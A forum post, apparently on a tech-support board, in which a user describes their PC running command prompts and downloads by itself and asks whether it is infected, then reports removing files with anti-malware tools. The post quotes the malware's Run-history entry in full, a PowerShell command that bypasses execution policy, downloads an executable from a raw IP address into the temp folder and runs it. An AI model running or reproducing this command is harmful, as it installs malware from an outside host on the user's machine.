Computer began running cmd.exe and running downloads on its own

I was away from my PC for about 3 minutes, and when I came back to it items were opening and closing fast. It looked like a couple cmd prompt items ran and when I was it open Run i shut off the PC immediately. I started it back up and looked at the Run history and saw "SystemPropertiesAdvanced", "cmd.exe", and "PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://92 . 63 . 197 . 48/kkk.exe','%temp%\853800385940.exe');Start-Process '%temp%\853800385940.exe'". I haven't had any issues before, and the latest file I downloaded was Forza Horizon 4 from the Microsoft store. If anyone has any idea if I have a virus please let me know, thanks a ton.

I figured as much, any recommendations? I ran Malware bytes and Hitman Pro and was able to quarentine then delete a couple files. I also wiped the temp folder to be sure. Wasn't wanting to do a full wipe, but looks like I may have to.
